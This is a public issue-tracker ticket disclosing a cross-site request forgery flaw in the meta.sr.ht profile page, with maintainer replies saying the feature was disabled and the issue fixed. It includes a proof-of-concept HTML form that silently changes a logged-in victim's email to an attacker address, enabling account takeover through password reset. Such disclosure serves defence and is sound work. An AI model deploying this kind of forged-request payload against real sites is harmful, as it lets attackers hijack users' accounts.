Security: Vulnerable to Cross-site Request Forgery (CSRF)

The website is vulnerable to cross-site request forgery (CSRF). Attackers can host the following HTML to force a user into changing their email address to an attacker's email address.

  <script>history.pushState('', '', '/')</script>
    <form action="https://meta.sr.ht/profile" method="POST">
      <input type="hidden" name="email" value="attacker&#64;example&#46;com" />
      <input type="hidden" name="url" value="" />
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="bio" value="" />
      <input type="submit" value="Submit request" />

Once a user that is logged in visits the page, a POST request is made to modify their email address. The attacker then receives a confirmation email and can now perform a password reset. The request above is just an example, but will apply to any state changing request.

Feel free to ping me if you have any other questions.

Resources: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

Assigned to
4 years ago
4 years ago
No labels applied.

~sircmpwn 4 years ago

Thank you. In the future, send security-related issues as an email, not as a public ticket.

~alxjsn 4 years ago

Sorry about that. Feel free to remove this ticket then.

~sircmpwn 4 years ago

I have disabled this feature in meta.sr.ht in production for now, a proper fix will follow shortly.

~sircmpwn REPORTED FIXED 4 years ago

Register here or Log in to comment, or comment via email.